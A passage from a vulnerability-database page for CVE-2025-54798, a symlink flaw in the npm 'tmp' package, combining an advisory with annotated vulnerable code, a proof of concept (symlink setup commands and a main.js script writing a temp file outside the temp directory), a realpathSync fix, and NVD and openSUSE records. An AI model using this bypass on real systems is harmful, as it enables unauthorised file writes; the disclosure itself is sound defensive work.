 * condition this advisory reports (CWE-59); the advisory lists 0.2.4 as the
 * fixed version.
 *
 * @param {string} name   option value to check
 * @param {string} option option key being checked ('name', 'dir', 'template')
 * @param {string} tmpDir temporary-directory root
 * @throws {Error} when the value is rejected
 */
function _assertIsRelative(name, option, tmpDir) {
if (option === 'name') {
// assert that name is not absolute and does not contain a path
if (path.isAbsolute(name))
throw new Error(`${option} option must not contain an absolute path, found "${name}".`);
// must not fail on valid .<name> or ..<name> or similar such constructs
let basename = path.basename(name);
if (basename === '..' || basename === '.' || basename !== name)
throw new Error(`${option} option must not contain a path, found "${name}".`);
}
else { // if (option === 'dir' || option === 'template') {
// assert that dir or template are relative to tmpDir
// First gate: an absolute value is rejected unless its string begins with tmpDir.
if (path.isAbsolute(name) && !name.startsWith(tmpDir)) {
throw new Error(`${option} option must be relative to "${tmpDir}", found "${name}".`);
}
// Second gate: re-check after normalisation, which catches `..` segments that
// climb out of tmpDir. _resolvePath is lexical, so what is compared below is
// the path string, not the filesystem location it finally refers to.
let resolvedPath = _resolvePath(name, tmpDir); //<--- lexical resolution only; symlinks are not followed
if (!resolvedPath.startsWith(tmpDir))
throw new Error(`${option} option must be relative to "${tmpDir}", found "${resolvedPath}".`);
}
}
PoC
The following PoC demonstrates that a tmp file can be written to a folder outside the tmpDir.
Tested on a Linux machine.
- Setup: create a symbolic link inside the
tmpDirthat points to a directory outside of it ```bash mkdir $HOME/mydir1
ln -s $HOME/mydir1 ${TMPDIR:-/tmp}/evil-dir ```
-
check the folder is empty:
bash ls -lha $HOME/mydir1 | grep "tmp-" -
run the poc
bash node main.js File: /tmp/evil-dir/tmp-26821-Vw87SLRaBIlf test 1: ENOENT: no such file or directory, open '/tmp/mydir1/tmp-[random-id]' test 2: dir option must be relative to "/tmp", found "/foo". test 3: dir option must be relative to "/tmp", found "/home/user/mydir1". -
the temporary file is created under
$HOME/mydir1(outside thetmpDir):bash ls -lha $HOME/mydir1 | grep "tmp-" -rw------- 1 user user 0 Apr X XX:XX tmp-[random-id] -
main.js```js // npm i tmp@0.2.3
const tmp = require('tmp');
// Reported case: 'evil-dir' is the symlink from the setup step. The call succeeds and the
// printed name is under the temp directory, while the file itself is created in the link target.
const tmpobj = tmp.fileSync({ 'dir': 'evil-dir'}); console.log('File: ', tmpobj.name);
// test 1: 'mydir1' is taken relative to the temp directory, where no such directory exists -> ENOENT on open.
try { tmp.fileSync({ 'dir': 'mydir1'}); } catch (err) { console.log('test 1:', err.message) }
// test 2: an absolute path outside the temp directory is rejected by the option check.
try { tmp.fileSync({ 'dir': '/foo'}); } catch (err) { console.log('test 2:', err.message) }
// test 3: the canonical (realpath) form of the same symlink is rejected, i.e. the existing
// check is effective once symlinks have been resolved before the comparison.
try { const fs = require('node:fs'); const resolved = fs.realpathSync('/tmp/evil-dir'); tmp.fileSync({ 'dir': resolved}); } catch (err) { console.log('test 3:', err.message) } ```
A potential fix is to call fs.realpathSync (or similar), which also resolves symbolic links, so that the containment check runs on the real path.
js
/**
 * Resolves `name` to a canonical absolute path.
 *
 * The path is first made absolute lexically (anchored under `tmpDir` unless
 * it already begins with the `tmpDir` string) and then passed through
 * fs.realpathSync(), so every symbolic link along it is replaced by its
 * target before the caller compares the result with `tmpDir`.
 *
 * Review notes for anyone adopting this sketch:
 * - fs.realpathSync() throws (for example ENOENT) when the path does not
 *   exist, so a missing directory is now reported at validation time.
 *   NOTE(review): _assertIsRelative also sends `template` values through
 *   this function; whether those name an existing path is not visible
 *   here, so confirm before relying on this for them.
 * - NOTE(review): the caller compares the result with `tmpDir` by string
 *   prefix; that is only meaningful if `tmpDir` is itself canonical.
 *   Confirm how tmpDir is derived.
 * - Canonicalising at check time narrows, but does not remove, the window
 *   between validating the path and creating the file in it.
 *
 * @param {string} name   path value to resolve
 * @param {string} tmpDir temporary-directory root
 * @returns {string} canonical absolute path with symlinks resolved
 * @throws {Error} whatever fs.realpathSync() raises, e.g. when the path does not exist
 */
function _resolvePath(name, tmpDir) {
  // Step 1: purely lexical normalisation, same rule as the original helper.
  const lexicalPath = name.startsWith(tmpDir)
    ? path.resolve(name)
    : path.resolve(path.join(tmpDir, name));

  // Step 2: ask the filesystem for the real location behind that string.
  return fs.realpathSync(lexicalPath);
}
Impact
Arbitrary temporary file / directory write via symlink
{
"affected": [
{
"database_specific": {
"last_known_affected_version_range": "\u003c= 0.2.3"
},
"package": {
"ecosystem": "npm",
"name": "tmp"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "0.2.4"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2025-54798"
],
"database_specific": {
"cwe_ids": [
"CWE-59"
],
"github_reviewed": true,
"github_reviewed_at": "2025-08-06T17:06:04Z",
"nvd_published_at": "2025-08-07T01:15:26Z",
"severity": "LOW"
},
"details": "### Summary\n\n`tmp@0.2.3` is vulnerable to an Arbitrary temporary file / directory write via symbolic link `dir` parameter.\n\n\n### Details\n\nAccording to the documentation there are some conditions that must be held:\n\n```\n// https://github.com/raszi/node-tmp/blob/v0.2.3/README.md?plain=1#L41-L50\n\nOther breaking changes, i.e.\n\n- template must be relative to tmpdir\n- name must be relative to tmpdir\n- dir option must be relative to tmpdir //\u003c-- this assumption can be bypassed using symlinks\n\nare still in place.\n\nIn order to override the system\u0027s tmpdir, you will have to use the newly\nintroduced tmpdir option.\n\n\n// https://github.com/raszi/node-tmp/blob/v0.2.3/README.md?plain=1#L375\n* `dir`: the optional temporary directory that must be relative to the system\u0027s default temporary directory.\n absolute paths are fine as long as they point to a location under the system\u0027s default temporary directory.\n Any directories along the so specified path must exist, otherwise a ENOENT error will be thrown upon access, \n as tmp will not check the availability of the path, nor will it establish the requested path for you.\n```\n\nRelated issue: https://github.com/raszi/node-tmp/issues/207.\n\n\nThe issue occurs because `_resolvePath` does not properly handle symbolic link when resolving paths:\n```js\n// https://github.com/raszi/node-tmp/blob/v0.2.3/lib/tmp.js#L573-L579\nfunction _resolvePath(name, tmpDir) {\n if (name.startsWith(tmpDir)) {\n return path.resolve(name);\n } else {\n return path.resolve(path.join(tmpDir, name));\n }\n}\n```\n\nIf the `dir` parameter points to a symlink that resolves to a folder outside the `tmpDir`, it\u0027s possible to bypass the `_assertIsRelative` check used in `_assertAndSanitizeOptions`:\n```js\n// https://github.com/raszi/node-tmp/blob/v0.2.3/lib/tmp.js#L590-L609\nfunction _assertIsRelative(name, option, tmpDir) {\n if (option === \u0027name\u0027) {\n // assert that name is not absolute 
and does not contain a path\n if (path.isAbsolute(name))\n throw new Error(`${option} option must not contain an absolute path, found \"${name}\".`);\n // must not fail on valid .\u003cname\u003e or ..\u003cname\u003e or similar such constructs\n let basename = path.basename(name);\n if (basename === \u0027..\u0027 || basename === \u0027.\u0027 || basename !== name)\n throw new Error(`${option} option must not contain a path, found \"${name}\".`);\n }\n else { // if (option === \u0027dir\u0027 || option === \u0027template\u0027) {\n // assert that dir or template are relative to tmpDir\n if (path.isAbsolute(name) \u0026\u0026 !name.startsWith(tmpDir)) {\n throw new Error(`${option} option must be relative to \"${tmpDir}\", found \"${name}\".`);\n }\n let resolvedPath = _resolvePath(name, tmpDir); //\u003c--- \n if (!resolvedPath.startsWith(tmpDir))\n throw new Error(`${option} option must be relative to \"${tmpDir}\", found \"${resolvedPath}\".`);\n }\n}\n```\n\n\n### PoC\n\nThe following PoC demonstrates how writing a tmp file on a folder outside the `tmpDir` is possible.\nTested on a Linux machine.\n\n- Setup: create a symbolic link inside the `tmpDir` that points to a directory outside of it\n```bash\nmkdir $HOME/mydir1\n\nln -s $HOME/mydir1 ${TMPDIR:-/tmp}/evil-dir\n```\n\n- check the folder is empty:\n```bash\nls -lha $HOME/mydir1 | grep \"tmp-\"\n```\n\n- run the poc\n```bash\nnode main.js\nFile: /tmp/evil-dir/tmp-26821-Vw87SLRaBIlf\ntest 1: ENOENT: no such file or directory, open \u0027/tmp/mydir1/tmp-[random-id]\u0027\ntest 2: dir option must be relative to \"/tmp\", found \"/foo\".\ntest 3: dir option must be relative to \"/tmp\", found \"/home/user/mydir1\".\n```\n\n- the temporary file is created under `$HOME/mydir1` (outside the `tmpDir`):\n```bash\nls -lha $HOME/mydir1 | grep \"tmp-\"\n-rw------- 1 user user 0 Apr X XX:XX tmp-[random-id]\n```\n\n\n- `main.js`\n```js\n// npm i tmp@0.2.3\n\nconst tmp = require(\u0027tmp\u0027);\n\nconst tmpobj = 
tmp.fileSync({ \u0027dir\u0027: \u0027evil-dir\u0027});\nconsole.log(\u0027File: \u0027, tmpobj.name);\n\ntry {\n tmp.fileSync({ \u0027dir\u0027: \u0027mydir1\u0027});\n} catch (err) {\n console.log(\u0027test 1:\u0027, err.message)\n}\n\ntry {\n tmp.fileSync({ \u0027dir\u0027: \u0027/foo\u0027});\n} catch (err) {\n console.log(\u0027test 2:\u0027, err.message)\n}\n\ntry {\n const fs = require(\u0027node:fs\u0027);\n const resolved = fs.realpathSync(\u0027/tmp/evil-dir\u0027);\n tmp.fileSync({ \u0027dir\u0027: resolved});\n} catch (err) {\n console.log(\u0027test 3:\u0027, err.message)\n}\n```\n\n\nA Potential fix could be to call `fs.realpathSync` (or similar) that resolves also symbolic links.\n```js\nfunction _resolvePath(name, tmpDir) {\n let resolvedPath;\n if (name.startsWith(tmpDir)) {\n resolvedPath = path.resolve(name);\n } else {\n resolvedPath = path.resolve(path.join(tmpDir, name));\n }\n return fs.realpathSync(resolvedPath);\n}\n```\n\n\n### Impact\n\nArbitrary temporary file / directory write via symlink",
"id": "GHSA-52f5-9888-hmc6",
"modified": "2025-11-03T21:34:20Z",
"published": "2025-08-06T17:06:04Z",
"references": [
{
"type": "WEB",
"url": "https://github.com/raszi/node-tmp/security/advisories/GHSA-52f5-9888-hmc6"
},
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2025-54798"
},
{
"type": "WEB",
"url": "https://github.com/raszi/node-tmp/issues/207"
},
{
"type": "WEB",
"url": "https://github.com/raszi/node-tmp/commit/188b25e529496e37adaf1a1d9dccb40019a08b1b"
},
{
"type": "PACKAGE",
"url": "https://github.com/raszi/node-tmp"
},
{
"type": "WEB",
"url": "https://lists.debian.org/debian-lts-announce/2025/08/msg00007.html"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:N/I:L/A:N",
"type": "CVSS_V3"
}
],
"summary": "tmp allows arbitrary temporary file / directory write via symbolic link `dir` parameter"
}
fkie_cve-2025-54798
Vulnerability from fkie_nvd
5.3 (Medium) - CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N
| Source | URL | Tags | |
|---|---|---|---|
| security-advisories@github.com | https://github.com/raszi/node-tmp/commit/188b25e529496e37adaf1a1d9dccb40019a08b1b | Patch | |
| security-advisories@github.com | https://github.com/raszi/node-tmp/issues/207 | Issue Tracking, Patch | |
| security-advisories@github.com | https://github.com/raszi/node-tmp/security/advisories/GHSA-52f5-9888-hmc6 | Exploit, Vendor Advisory | |
| af854a3a-2127-422b-91ae-364da2661108 | https://lists.debian.org/debian-lts-announce/2025/08/msg00007.html | ||
| 134c704f-9b21-4f2e-91b3-4a467353bcc0 | https://github.com/raszi/node-tmp/security/advisories/GHSA-52f5-9888-hmc6 | Exploit, Vendor Advisory |
{
"configurations": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:raszi:tmp:*:*:*:*:*:node.js:*:*",
"matchCriteriaId": "463A9FBD-7DD2-46BD-96B9-0A107149FF94",
"versionEndExcluding": "0.2.4",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"cveTags": [],
"descriptions": [
{
"lang": "en",
"value": "tmp is a temporary file and directory creator for node.js. In versions 0.2.3 and below, tmp is vulnerable to an arbitrary temporary file / directory write via symbolic link dir parameter. This is fixed in version 0.2.4."
},
{
"lang": "es",
"value": "tmp es un creador de archivos y directorios temporales para Node.js. En las versiones 0.2.3 y anteriores, tmp es vulnerable a la escritura arbitraria de archivos o directorios temporales mediante el par\u00e1metro dir de enlace simb\u00f3lico. Esto se solucion\u00f3 en la versi\u00f3n 0.2.4."
}
],
"id": "CVE-2025-54798",
"lastModified": "2025-11-03T20:19:15.177",
"metrics": {
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "HIGH",
"attackVector": "LOCAL",
"availabilityImpact": "NONE",
"baseScore": 2.5,
"baseSeverity": "LOW",
"confidentialityImpact": "NONE",
"integrityImpact": "LOW",
"privilegesRequired": "LOW",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:N/I:L/A:N",
"version": "3.1"
},
"exploitabilityScore": 1.0,
"impactScore": 1.4,
"source": "security-advisories@github.com",
"type": "Secondary"
},
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 5.3,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "NONE",
"integrityImpact": "LOW",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N",
"version": "3.1"
},
"exploitabilityScore": 3.9,
"impactScore": 1.4,
"source": "nvd@nist.gov",
"type": "Primary"
}
]
},
"published": "2025-08-07T01:15:26.203",
"references": [
{
"source": "security-advisories@github.com",
"tags": [
"Patch"
],
"url": "https://github.com/raszi/node-tmp/commit/188b25e529496e37adaf1a1d9dccb40019a08b1b"
},
{
"source": "security-advisories@github.com",
"tags": [
"Issue Tracking",
"Patch"
],
"url": "https://github.com/raszi/node-tmp/issues/207"
},
{
"source": "security-advisories@github.com",
"tags": [
"Exploit",
"Vendor Advisory"
],
"url": "https://github.com/raszi/node-tmp/security/advisories/GHSA-52f5-9888-hmc6"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"url": "https://lists.debian.org/debian-lts-announce/2025/08/msg00007.html"
},
{
"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"tags": [
"Exploit",
"Vendor Advisory"
],
"url": "https://github.com/raszi/node-tmp/security/advisories/GHSA-52f5-9888-hmc6"
}
],
"sourceIdentifier": "security-advisories@github.com",
"vulnStatus": "Modified",
"weaknesses": [
{
"description": [
{
"lang": "en",
"value": "CWE-59"
}
],
"source": "security-advisories@github.com",
"type": "Secondary"
}
]
}
opensuse-su-2025:15506-1
Vulnerability from csaf_opensuse
Notes
{
"document": {
"aggregate_severity": {
"namespace": "https://www.suse.com/support/security/rating/",
"text": "moderate"
},
"category": "csaf_security_advisory",
"csaf_version": "2.0",
"distribution": {
"text": "Copyright 2024 SUSE LLC. All rights reserved.",
"tlp": {
"label": "WHITE",
"url": "https://www.first.org/tlp/"
}
},
"lang": "en",
"notes": [
{
"category": "summary",
"text": "jupyter-bqplot-jupyterlab-0.5.46-13.1 on GA media",
"title": "Title of the patch"
},
{
"category": "description",
"text": "These are all security issues fixed in the jupyter-bqplot-jupyterlab-0.5.46-13.1 package on the GA media of openSUSE Tumbleweed.",
"title": "Description of the patch"
},
{
"category": "details",
"text": "openSUSE-Tumbleweed-2025-15506",
"title": "Patchnames"
},
{
"category": "legal_disclaimer",
"text": "CSAF 2.0 data is provided by SUSE under the Creative Commons License 4.0 with Attribution (CC-BY-4.0).",
"title": "Terms of use"
}
],
"publisher": {
"category": "vendor",
"contact_details": "https://www.suse.com/support/security/contact/",
"name": "SUSE Product Security Team",
"namespace": "https://www.suse.com/"
},
"references": [
{
"category": "external",
"summary": "SUSE ratings",
"url": "https://www.suse.com/support/security/rating/"
},
{
"category": "self",
"summary": "URL of this CSAF notice",
"url": "https://ftp.suse.com/pub/projects/security/csaf/opensuse-su-2025_15506-1.json"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-54798 page",
"url": "https://www.suse.com/security/cve/CVE-2025-54798/"
}
],
"title": "jupyter-bqplot-jupyterlab-0.5.46-13.1 on GA media",
"tracking": {
"current_release_date": "2025-09-01T00:00:00Z",
"generator": {
"date": "2025-09-01T00:00:00Z",
"engine": {
"name": "cve-database.git:bin/generate-csaf.pl",
"version": "1"
}
},
"id": "openSUSE-SU-2025:15506-1",
"initial_release_date": "2025-09-01T00:00:00Z",
"revision_history": [
{
"date": "2025-09-01T00:00:00Z",
"number": "1",
"summary": "Current version"
}
],
"status": "final",
"version": "1"
}
},
"product_tree": {
"branches": [
{
"branches": [
{
"branches": [
{
"category": "product_version",
"name": "jupyter-bqplot-jupyterlab-0.5.46-13.1.aarch64",
"product": {
"name": "jupyter-bqplot-jupyterlab-0.5.46-13.1.aarch64",
"product_id": "jupyter-bqplot-jupyterlab-0.5.46-13.1.aarch64"
}
},
{
"category": "product_version",
"name": "jupyter-bqplot-notebook-0.5.46-13.1.aarch64",
"product": {
"name": "jupyter-bqplot-notebook-0.5.46-13.1.aarch64",
"product_id": "jupyter-bqplot-notebook-0.5.46-13.1.aarch64"
}
},
{
"category": "product_version",
"name": "python311-bqplot-0.12.45-13.1.aarch64",
"product": {
"name": "python311-bqplot-0.12.45-13.1.aarch64",
"product_id": "python311-bqplot-0.12.45-13.1.aarch64"
}
}
],
"category": "architecture",
"name": "aarch64"
},
{
"branches": [
{
"category": "product_version",
"name": "jupyter-bqplot-jupyterlab-0.5.46-13.1.ppc64le",
"product": {
"name": "jupyter-bqplot-jupyterlab-0.5.46-13.1.ppc64le",
"product_id": "jupyter-bqplot-jupyterlab-0.5.46-13.1.ppc64le"
}
},
{
"category": "product_version",
"name": "jupyter-bqplot-notebook-0.5.46-13.1.ppc64le",
"product": {
"name": "jupyter-bqplot-notebook-0.5.46-13.1.ppc64le",
"product_id": "jupyter-bqplot-notebook-0.5.46-13.1.ppc64le"
}
},
{
"category": "product_version",
"name": "python311-bqplot-0.12.45-13.1.ppc64le",
"product": {
"name": "python311-bqplot-0.12.45-13.1.ppc64le",
"product_id": "python311-bqplot-0.12.45-13.1.ppc64le"
}
}
],
"category": "architecture",
"name": "ppc64le"
},
{
"branches": [
{
"category": "product_version",
"name": "jupyter-bqplot-jupyterlab-0.5.46-13.1.s390x",
"product": {
"name": "jupyter-bqplot-jupyterlab-0.5.46-13.1.s390x",
"product_id": "jupyter-bqplot-jupyterlab-0.5.46-13.1.s390x"
}
},
{
"category": "product_version",
"name": "jupyter-bqplot-notebook-0.5.46-13.1.s390x",
"product": {
"name": "jupyter-bqplot-notebook-0.5.46-13.1.s390x",
"product_id": "jupyter-bqplot-notebook-0.5.46-13.1.s390x"
}
},
{
"category": "product_version",
"name": "python311-bqplot-0.12.45-13.1.s390x",
"product": {
"name": "python311-bqplot-0.12.45-13.1.s390x",
"product_id": "python311-bqplot-0.12.45-13.1.s390x"
}
}
],
"category": "architecture",
"name": "s390x"
},
{
"branches": [
{
"category": "product_version",
"name": "jupyter-bqplot-jupyterlab-0.5.46-13.1.x86_64",
"product": {
"name": "jupyter-bqplot-jupyterlab-0.5.46-13.1.x86_64",
"product_id": "jupyter-bqplot-jupyterlab-0.5.46-13.1.x86_64"
}
},
{
"category": "product_version",
"name": "jupyter-bqplot-notebook-0.5.46-13.1.x86_64",
"product": {
"name": "jupyter-bqplot-notebook-0.5.46-13.1.x86_64",
"product_id": "jupyter-bqplot-notebook-0.5.46-13.1.x86_64"
}
},
{
"category": "product_version",
"name": "python311-bqplot-0.12.45-13.1.x86_64",
"product": {
"name": "python311-bqplot-0.12.45-13.1.x86_64",
"product_id": "python311-bqplot-0.12.45-13.1.x86_64"
}
}
],
"category": "architecture",
"name": "x86_64"
},
{
"branches": [
{
"category": "product_name",
"name": "openSUSE Tumbleweed",
"product": {
"name": "openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed",
"product_identification_helper": {
"cpe": "cpe:/o:opensuse:tumbleweed"
}
}
}
],
"category": "product_family",
"name": "SUSE Linux Enterprise"
}
],
"category": "vendor",
"name": "SUSE"
}
],
"relationships": [
{
"category": "default_component_of",
"full_product_name": {
"name": "jupyter-bqplot-jupyterlab-0.5.46-13.1.aarch64 as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:jupyter-bqplot-jupyterlab-0.5.46-13.1.aarch64"
},
"product_reference": "jupyter-bqplot-jupyterlab-0.5.46-13.1.aarch64",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "jupyter-bqplot-jupyterlab-0.5.46-13.1.ppc64le as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:jupyter-bqplot-jupyterlab-0.5.46-13.1.ppc64le"
},
"product_reference": "jupyter-bqplot-jupyterlab-0.5.46-13.1.ppc64le",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "jupyter-bqplot-jupyterlab-0.5.46-13.1.s390x as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:jupyter-bqplot-jupyterlab-0.5.46-13.1.s390x"
},
"product_reference": "jupyter-bqplot-jupyterlab-0.5.46-13.1.s390x",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "jupyter-bqplot-jupyterlab-0.5.46-13.1.x86_64 as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:jupyter-bqplot-jupyterlab-0.5.46-13.1.x86_64"
},
"product_reference": "jupyter-bqplot-jupyterlab-0.5.46-13.1.x86_64",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "jupyter-bqplot-notebook-0.5.46-13.1.aarch64 as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:jupyter-bqplot-notebook-0.5.46-13.1.aarch64"
},
"product_reference": "jupyter-bqplot-notebook-0.5.46-13.1.aarch64",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "jupyter-bqplot-notebook-0.5.46-13.1.ppc64le as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:jupyter-bqplot-notebook-0.5.46-13.1.ppc64le"
},
"product_reference": "jupyter-bqplot-notebook-0.5.46-13.1.ppc64le",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "jupyter-bqplot-notebook-0.5.46-13.1.s390x as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:jupyter-bqplot-notebook-0.5.46-13.1.s390x"
},
"product_reference": "jupyter-bqplot-notebook-0.5.46-13.1.s390x",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "jupyter-bqplot-notebook-0.5.46-13.1.x86_64 as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:jupyter-bqplot-notebook-0.5.46-13.1.x86_64"
},
"product_reference": "jupyter-bqplot-notebook-0.5.46-13.1.x86_64",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "python311-bqplot-0.12.45-13.1.aarch64 as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:python311-bqplot-0.12.45-13.1.aarch64"
},
"product_reference": "python311-bqplot-0.12.45-13.1.aarch64",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "python311-bqplot-0.12.45-13.1.ppc64le as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:python311-bqplot-0.12.45-13.1.ppc64le"
},
"product_reference": "python311-bqplot-0.12.45-13.1.ppc64le",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "python311-bqplot-0.12.45-13.1.s390x as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:python311-bqplot-0.12.45-13.1.s390x"
},
"product_reference": "python311-bqplot-0.12.45-13.1.s390x",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "python311-bqplot-0.12.45-13.1.x86_64 as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:python311-bqplot-0.12.45-13.1.x86_64"
},
"product_reference": "python311-bqplot-0.12.45-13.1.x86_64",
"relates_to_product_reference": "openSUSE Tumbleweed"
}
]
},
"vulnerabilities": [
{
"cve": "CVE-2025-54798",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-54798"
}
],
"notes": [
{
"category": "general",
"text": "tmp is a temporary file and directory creator for node.js. In versions 0.2.3 and below, tmp is vulnerable to an arbitrary temporary file / directory write via symbolic link dir parameter. This is fixed in version 0.2.4.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"openSUSE Tumbleweed:jupyter-bqplot-jupyterlab-0.5.46-13.1.aarch64",
"openSUSE Tumbleweed:jupyter-bqplot-jupyterlab-0.5.46-13.1.ppc64le",
"openSUSE Tumbleweed:jupyter-bqplot-jupyterlab-0.5.46-13.1.s390x",
"openSUSE Tumbleweed:jupyter-bqplot-jupyterlab-0.5.46-13.1.x86_64",
"openSUSE Tumbleweed:jupyter-bqplot-notebook-0.5.46-13.1.aarch64",
"openSUSE Tumbleweed:jupyter-bqplot-notebook-0.5.46-13.1.ppc64le",
"openSUSE Tumbleweed:jupyter-bqplot-notebook-0.5.46-13.1.s390x",
"openSUSE Tumbleweed:jupyter-bqplot-notebook-0.5.46-13.1.x86_64",
"openSUSE Tumbleweed:python311-bqplot-0.12.45-13.1.aarch64",
"openSUSE Tumbleweed:python311-bqplot-0.12.45-13.1.ppc64le",
"openSUSE Tumbleweed:python311-bqplot-0.12.45-13.1.s390x",
"openSUSE Tumbleweed:python311-bqplot-0.12.45-13.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-54798",
"url": "https://www.suse.com/security/cve/CVE-2025-54798"
},
{
"category": "external",
"summary": "SUSE Bug 1247787 for CVE-2025-54798",
"url": "https://bugzilla.suse.com/1247787"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"openSUSE Tumbleweed:jupyter-bqplot-jupyterlab-0.5.46-13.1.aarch64",
"openSUSE Tumbleweed:jupyter-bqplot-jupyterlab-0.5.46-13.1.ppc64le",
"openSUSE Tumbleweed:jupyter-bqplot-jupyterlab-0.5.46-13.1.s390x",
"openSUSE Tumbleweed:jupyter-bqplot-jupyterlab-0.5.46-13.1.x86_64",
"openSUSE Tumbleweed:jupyter-bqplot-notebook-0.5.46-13.1.aarch64",
"openSUSE Tumbleweed:jupyter-bqplot-notebook-0.5.46-13.1.ppc64le",
"openSUSE Tumbleweed:jupyter-bqplot-notebook-0.5.46-13.1.s390x",
"openSUSE Tumbleweed:jupyter-bqplot-notebook-0.5.46-13.1.x86_64",
"openSUSE Tumbleweed:python311-bqplot-0.12.45-13.1.aarch64",
"openSUSE Tumbleweed:python311-bqplot-0.12.45-13.1.ppc64le",
"openSUSE Tumbleweed:python311-bqplot-0.12.45-13.1.s390x",
"openSUSE Tumbleweed:python311-bqplot-0.12.45-13.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 2.5,
"baseSeverity": "LOW",
"vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:N/I:L/A:N",
"version": "3.1"
},
"products": [
"openSUSE Tumbleweed:jupyter-bqplot-jupyterlab-0.5.46-13.1.aarch64",
"openSUSE Tumbleweed:jupyter-bqplot-jupyterlab-0.5.46-13.1.ppc64le",
"openSUSE Tumbleweed:jupyter-bqplot-jupyterlab-0.5.46-13.1.s390x",
"openSUSE Tumbleweed:jupyter-bqplot-jupyterlab-0.5.46-13.1.x86_64",
"openSUSE Tumbleweed:jupyter-bqplot-notebook-0.5.46-13.1.aarch64",
"openSUSE Tumbleweed:jupyter-bqplot-notebook-0.5.46-13.1.ppc64le",
"openSUSE Tumbleweed:jupyter-bqplot-notebook-0.5.46-13.1.s390x",
"openSUSE Tumbleweed:jupyter-bqplot-notebook-0.5.46-13.1.x86_64",
"openSUSE Tumbleweed:python311-bqplot-0.12.45-13.1.aarch64",
"openSUSE Tumbleweed:python311-bqplot-0.12.45-13.1.ppc64le",
"openSUSE Tumbleweed:python311-bqplot-0.12.45-13.1.s390x",
"openSUSE Tumbleweed:python311-bqplot-0.12.45-13.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2025-09-01T00:00:00Z",
"details": "moderate"
}
],
"title": "CVE-2025-54798"
}
]
}
opensuse-su-2025:15502-1
Vulnerability from csaf_opensuse
Notes
{
"document": {
"aggregate_severity": {
"namespace": "https://www.suse.com/support/security/rating/",
"text": "moderate"
},
"category": "csaf_security_advisory",
"csaf_version": "2.0",
"distribution": {
"text": "Copyright 2024 SUSE LLC. All rights reserved.",
"tlp": {
"label": "WHITE",
"url": "https://www.first.org/tlp/"
}
},
"lang": "en",
"notes": [
{
"category": "summary",
"text": "jupyter-nbdime-7.0.2-23.1 on GA media",
"title": "Title of the patch"
},
{
"category": "description",
"text": "These are all security issues fixed in the jupyter-nbdime-7.0.2-23.1 package on the GA media of openSUSE Tumbleweed.",
"title": "Description of the patch"
},
{
"category": "details",
"text": "openSUSE-Tumbleweed-2025-15502",
"title": "Patchnames"
},
{
"category": "legal_disclaimer",
"text": "CSAF 2.0 data is provided by SUSE under the Creative Commons License 4.0 with Attribution (CC-BY-4.0).",
"title": "Terms of use"
}
],
"publisher": {
"category": "vendor",
